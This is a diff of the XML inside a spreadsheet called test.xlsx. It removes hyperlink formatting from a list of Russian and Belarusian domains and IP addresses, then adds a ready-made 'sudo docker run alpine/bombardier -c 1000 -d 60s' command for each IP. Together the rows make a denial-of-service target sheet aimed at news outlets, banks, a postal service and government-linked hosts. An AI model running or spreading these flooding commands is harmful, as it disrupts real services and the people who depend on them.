--- a/test.xlsx
+++ b/test.xlsx
@@ -19,15 +19,7 @@
     <t>178.172.163.106</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="11"/>
-        <color indexed="10"/>
-        <rFont val="Arial"/>
-      </rPr>
-      <t>www.bpc.by</t>
-    </r>
+    <t>bpc.by</t>
   </si>
   <si>
     <t>178.124.138.31</t>
@@ -39,15 +31,7 @@
     <t>104.21.50.131</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="11"/>
-        <color indexed="10"/>
-        <rFont val="Arial"/>
-      </rPr>
-      <t>bg14.ru</t>
-    </r>
+    <t>bg14.ru</t>
   </si>
   <si>
     <t>172.67.163.61</t>
@@ -140,15 +124,7 @@
     <t>212.109.222.156</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="11"/>
-        <color indexed="10"/>
-        <rFont val="Arial"/>
-      </rPr>
-      <t>pravda.ru</t>
-    </r>
+    <t>pravda.ru</t>
   </si>
   <si>
     <t>195.20.48.32</t>
@@ -292,15 +268,7 @@
     <t>195.208.1.119</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <u val="single"/>
-        <sz val="11"/>
-        <color indexed="10"/>
-        <rFont val="Arial"/>
-      </rPr>
-      <t>oborona.ru</t>
-    </r>
+    <t>oborona.ru</t>
   </si>
   <si>
     <t>195.20.52.17</t>
@@ -355,7 +323,7 @@
   <numFmts count="1">
     <numFmt numFmtId="0" formatCode="General"/>
   </numFmts>
-  <fonts count="4">
+  <fonts count="3">
     <font>
       <sz val="11"/>
       <color indexed="8"/>
@@ -371,19 +339,19 @@
       <color indexed="8"/>
       <name val="Calibri"/>
     </font>
-    <font>
-      <u val="single"/>
-      <sz val="11"/>
-      <color indexed="10"/>
-      <name val="Arial"/>
-    </font>
   </fonts>
-  <fills count="2">
+  <fills count="3">
     <fill>
       <patternFill patternType="none"/>
     </fill>
     <fill>
       <patternFill patternType="gray125"/>
+    </fill>
+    <fill>
+      <patternFill patternType="solid">
+        <fgColor indexed="9"/>
+        <bgColor auto="1"/>
+      </patternFill>
     </fill>
   </fills>
   <borders count="2">
@@ -396,16 +364,16 @@
     </border>
     <border>
       <left style="thin">
-        <color indexed="9"/>
+        <color indexed="10"/>
       </left>
       <right style="thin">
-        <color indexed="9"/>
+        <color indexed="10"/>
       </right>
       <top style="thin">
-        <color indexed="9"/>
+        <color indexed="10"/>
       </top>
       <bottom style="thin">
-        <color indexed="9"/>
+        <color indexed="10"/>
       </bottom>
       <diagonal/>
     </border>
@@ -415,18 +383,21 @@
       <alignment vertical="bottom"/>
     </xf>
   </cellStyleXfs>
-  <cellXfs count="4">
+  <cellXfs count="5">
     <xf numFmtId="0" fontId="0" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="0" applyAlignment="1" applyProtection="0">
       <alignment vertical="bottom"/>
     </xf>
     <xf numFmtId="0" fontId="0" applyNumberFormat="1" applyFont="1" applyFill="0" applyBorder="0" applyAlignment="1" applyProtection="0">
       <alignment vertical="bottom"/>
     </xf>
-    <xf numFmtId="49" fontId="0" borderId="1" applyNumberFormat="1" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1" applyProtection="0">
+    <xf numFmtId="49" fontId="0" fillId="2" borderId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="0">
       <alignment vertical="bottom"/>
     </xf>
-    <xf numFmtId="0" fontId="0" borderId="1" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1" applyProtection="0">
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="1" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="0">
       <alignment vertical="bottom"/>
+    </xf>
+    <xf numFmtId="49" fontId="0" fillId="2" borderId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="0">
+      <alignment vertical="bottom" wrapText="1"/>
     </xf>
   </cellXfs>
   <cellStyles count="1">
@@ -445,8 +416,8 @@
       <rgbColor rgb="ffff00ff"/>
       <rgbColor rgb="ff00ffff"/>
       <rgbColor rgb="ff000000"/>
+      <rgbColor rgb="ffffffff"/>
       <rgbColor rgb="ffaaaaaa"/>
-      <rgbColor rgb="ff0000ff"/>
     </indexedColors>
   </colors>
 </styleSheet>
@@ -584,13 +555,7 @@
           <a:effectLst/>
         </a:effectStyle>
         <a:effectStyle>
-          <a:effectLst>
-            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="20000" dir="5400000">
-              <a:srgbClr val="000000">
-                <a:alpha val="38000"/>
-              </a:srgbClr>
-            </a:outerShdw>
-          </a:effectLst>
+          <a:effectLst/>
         </a:effectStyle>
       </a:effectStyleLst>
       <a:bgFillStyleLst>
@@ -689,10 +654,10 @@
             </a:solidFill>
             <a:effectLst/>
             <a:uFillTx/>
-            <a:latin typeface="Cambria"/>
-            <a:ea typeface="Cambria"/>
-            <a:cs typeface="Cambria"/>
-            <a:sym typeface="Cambria"/>
+            <a:latin typeface="+mn-lt"/>
+            <a:ea typeface="+mn-ea"/>
+            <a:cs typeface="+mn-cs"/>
+            <a:sym typeface="Helvetica Neue"/>
           </a:defRPr>
         </a:defPPr>
         <a:lvl1pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" fontAlgn="auto" latinLnBrk="1" hangingPunct="0">
@@ -947,13 +912,7 @@
           <a:prstDash val="solid"/>
           <a:round/>
         </a:ln>
-        <a:effectLst>
-          <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="20000" dir="5400000">
-            <a:srgbClr val="000000">
-              <a:alpha val="38000"/>
-            </a:srgbClr>
-          </a:outerShdw>
-        </a:effectLst>
+        <a:effectLst/>
         <a:sp3d/>
       </a:spPr>
       <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91439" tIns="45719" rIns="91439" bIns="45719" numCol="1" spcCol="38100" rtlCol="0" anchor="t" upright="0">
@@ -1266,10 +1225,10 @@
             </a:solidFill>
             <a:effectLst/>
             <a:uFillTx/>
-            <a:latin typeface="Cambria"/>
-            <a:ea typeface="Cambria"/>
-            <a:cs typeface="Cambria"/>
-            <a:sym typeface="Cambria"/>
+            <a:latin typeface="+mn-lt"/>
+            <a:ea typeface="+mn-ea"/>
+            <a:cs typeface="+mn-cs"/>
+            <a:sym typeface="Helvetica Neue"/>
           </a:defRPr>
         </a:defPPr>
         <a:lvl1pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" fontAlgn="auto" latinLnBrk="1" hangingPunct="0">
@@ -1526,7 +1485,7 @@
   </sheetViews>
   <sheetFormatPr defaultColWidth="8.83333" defaultRowHeight="18" customHeight="1" outlineLevelRow="0" outlineLevelCol="0"/>
   <cols>
-    <col min="1" max="1" width="9.53125" style="1" customWidth="1"/>
+    <col min="1" max="1" width="9.5" style="1" customWidth="1"/>
     <col min="2" max="2" width="19.8516" style="1" customWidth="1"/>
     <col min="3" max="3" width="43" style="1" customWidth="1"/>
     <col min="4" max="5" width="8.85156" style="1" customWidth="1"/>
@@ -1566,7 +1525,7 @@
       <c r="B3" t="s" s="2">
         <v>5</v>
       </c>
-      <c r="C3" t="s" s="2">
+      <c r="C3" t="s" s="4">
         <v>6</v>
       </c>
       <c r="D3" s="3"/>
@@ -2839,78 +2798,6 @@
       <c r="E105" s="3"/>
     </row>
   </sheetData>
-  <hyperlinks>
-    <hyperlink ref="C1" r:id="rId1" location="" tooltip="" display="www.bpc.by"/>
-    <hyperlink ref="C3" r:id="rId2" location="" tooltip="" display="bg14.ru"/>
-    <hyperlink ref="C4" r:id="rId3" location="" tooltip="" display="bg14.ru"/>
-    <hyperlink ref="C29" r:id="rId4" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C30" r:id="rId5" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C31" r:id="rId6" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C32" r:id="rId7" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C33" r:id="rId8" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C34" r:id="rId9" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C35" r:id="rId10" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C36" r:id="rId11" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C37" r:id="rId12" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C38" r:id="rId13" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C39" r:id="rId14" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C40" r:id="rId15" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C41" r:id="rId16" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C42" r:id="rId17" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C43" r:id="rId18" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C44" r:id="rId19" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C45" r:id="rId20" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C46" r:id="rId21" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C47" r:id="rId22" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C48" r:id="rId23" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C49" r:id="rId24" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C50" r:id="rId25" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C51" r:id="rId26" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C52" r:id="rId27" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C53" r:id="rId28" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C54" r:id="rId29" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C55" r:id="rId30" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C56" r:id="rId31" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C57" r:id="rId32" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C58" r:id="rId33" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C59" r:id="rId34" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C60" r:id="rId35" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C61" r:id="rId36" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C62" r:id="rId37" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C63" r:id="rId38" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C64" r:id="rId39" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C65" r:id="rId40" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C66" r:id="rId41" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C67" r:id="rId42" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C68" r:id="rId43" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C69" r:id="rId44" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C70" r:id="rId45" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C71" r:id="rId46" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C72" r:id="rId47" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C73" r:id="rId48" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C74" r:id="rId49" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C75" r:id="rId50" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C76" r:id="rId51" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C77" r:id="rId52" location="" tooltip="" display="pravda.ru"/>
-    <hyperlink ref="C78" r:id="rId53" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C79" r:id="rId54" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C80" r:id="rId55" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C81" r:id="rId56" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C82" r:id="rId57" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C83" r:id="rId58" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C84" r:id="rId59" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C85" r:id="rId60" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C86" r:id="rId61" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C87" r:id="rId62" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C88" r:id="rId63" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C89" r:id="rId64" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C90" r:id="rId65" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C91" r:id="rId66" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C92" r:id="rId67" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C93" r:id="rId68" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C94" r:id="rId69" location="" tooltip="" display="oborona.ru"/>
-    <hyperlink ref="C95" r:id="rId70" location="" tooltip="" display="oborona.ru"/>
-  </hyperlinks>
   <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
   <pageSetup firstPageNumber="1" fitToHeight="1" fitToWidth="1" scale="100" useFirstPageNumber="0" orientation="portrait" pageOrder="downThenOver"/>
   <headerFooter>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,309 +11,1194 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="101">
-  <si>
-    <t>sudo</t>
-  </si>
-  <si>
-    <t>178.172.163.106</t>
-  </si>
-  <si>
-    <t>bpc.by</t>
-  </si>
-  <si>
-    <t>178.124.138.31</t>
-  </si>
-  <si>
-    <t>ont.by</t>
-  </si>
-  <si>
-    <t>104.21.50.131</t>
-  </si>
-  <si>
-    <t>bg14.ru</t>
-  </si>
-  <si>
-    <t>172.67.163.61</t>
-  </si>
-  <si>
-    <t>104.21.52.57</t>
-  </si>
-  <si>
-    <t>privatpay.online</t>
-  </si>
-  <si>
-    <t>172.67.195.242</t>
-  </si>
-  <si>
-    <t>172.67.73.86</t>
-  </si>
-  <si>
-    <t>mono-bank.org</t>
-  </si>
-  <si>
-    <t>104.26.3.67</t>
-  </si>
-  <si>
-    <t>104.26.2.67</t>
-  </si>
-  <si>
-    <t>172.67.3.106</t>
-  </si>
-  <si>
-    <t>rusvesna.su</t>
-  </si>
-  <si>
-    <t>108.162.193.71</t>
-  </si>
-  <si>
-    <t>108.162.192.67</t>
-  </si>
-  <si>
-    <t>104.21.24.94</t>
-  </si>
-  <si>
-    <t>104.20.73.219</t>
-  </si>
-  <si>
-    <t>95.131.27.119</t>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="396">
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 162.255.119.192&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>162.255.119.192</t>
+  </si>
+  <si>
+    <t>rtr-planeta.com</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.64.119.130&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.64.119.130</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.190.63.111&amp;&amp; sleep 5;</t>
   </si>
   <si>
     <t>64.190.63.111</t>
   </si>
   <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 72.52.179.175&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>72.52.179.175</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.134&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>80.247.32.134</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.206&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>80.247.32.206</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.209&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>80.247.32.209</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.46.30&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>80.247.46.30</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.46.68&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>80.247.46.68</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.46.69&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>80.247.46.69</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 109.234.156.107&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>109.234.156.107</t>
+  </si>
+  <si>
+    <t>vesti.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 151.248.120.203&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>151.248.120.203</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.31.179.191&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>176.31.179.191</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.99.12.170&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>176.99.12.170</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.208.83.45&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.208.83.45</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.232.222&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.248.232.222</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.10.45.39&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.10.45.39</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.22.235.94&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.22.235.94</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.113.234.215&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.113.234.215</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.209.148.130&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.209.148.130</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.42.165.36&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.42.165.36</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.69.196.234&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>217.69.196.234</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.205.163&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>31.31.205.163</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 46.21.252.14&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>46.21.252.14</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.188.28.172&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>5.188.28.172</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.188.30.5&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>5.188.30.5</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 52.50.65.32&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>52.50.65.32</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 62.122.170.171&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
     <t>62.122.170.171</t>
   </si>
   <si>
-    <t>31.31.198.173</t>
-  </si>
-  <si>
-    <t>186.2.163.192</t>
-  </si>
-  <si>
-    <t>anna-news.info</t>
-  </si>
-  <si>
-    <t>186.2.163.116</t>
-  </si>
-  <si>
-    <t>185.108.84.25</t>
-  </si>
-  <si>
-    <t>85.10.199.73</t>
-  </si>
-  <si>
-    <t>80.78.255.201</t>
-  </si>
-  <si>
-    <t>77.94.250.170</t>
-  </si>
-  <si>
-    <t>77.88.21.249</t>
-  </si>
-  <si>
-    <t>45.58.43.217</t>
-  </si>
-  <si>
-    <t>37.187.209.6</t>
-  </si>
-  <si>
-    <t>31.31.198.210</t>
-  </si>
-  <si>
-    <t>212.109.222.156</t>
-  </si>
-  <si>
-    <t>pravda.ru</t>
-  </si>
-  <si>
-    <t>195.20.48.32</t>
-  </si>
-  <si>
-    <t>185.250.205.146</t>
-  </si>
-  <si>
-    <t>185.201.55.135</t>
-  </si>
-  <si>
-    <t>185.201.55.130</t>
-  </si>
-  <si>
-    <t>185.201.54.62</t>
-  </si>
-  <si>
-    <t>185.201.54.61</t>
-  </si>
-  <si>
-    <t>185.201.54.54</t>
-  </si>
-  <si>
-    <t>185.84.110.84</t>
-  </si>
-  <si>
-    <t>185.9.147.200</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 78.46.39.162&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>78.46.39.162</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.208&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>80.247.32.208</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.247&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>80.247.32.247</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.13.58.18&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>81.13.58.18</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.176.77.99&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>81.176.77.99</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.90.180.107&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>81.90.180.107</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.146.36.160&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>82.146.36.160</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 87.236.16.206&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>87.236.16.206</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.211.250.222&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.211.250.222</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.236.136.178&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.236.136.178</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.241.170.215&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>92.241.170.215</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.31.224.95&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>95.31.224.95</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.106.250&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.106.250</t>
+  </si>
+  <si>
+    <t>belpost.by</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.22.41&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.22.41</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.88&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.88</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.209.219.60&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>82.209.219.60</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.198&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.98.162.198</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 117.52.98.56&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>117.52.98.56</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 3.64.163.50&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>3.64.163.50</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.197&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.98.162.197</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.193&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.98.162.193</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.22.132&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.22.132</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 107.161.23.204&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>107.161.23.204</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 51.83.138.45&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>51.83.138.45</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.160.223&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.124.160.223</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 86.57.145.166&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>86.57.145.166</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 78.46.101.98&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>78.46.101.98</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.195&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.98.162.195</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.26.187&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>104.21.26.187</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.37.28&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>104.21.37.28</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.73.144&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>104.21.73.144</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.78&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.98.168.78</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.75&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.98.168.75</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.164.68&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.98.164.68</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 164.88.67.126&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>164.88.67.126</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.196&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.98.162.196</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.70&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.98.168.70</t>
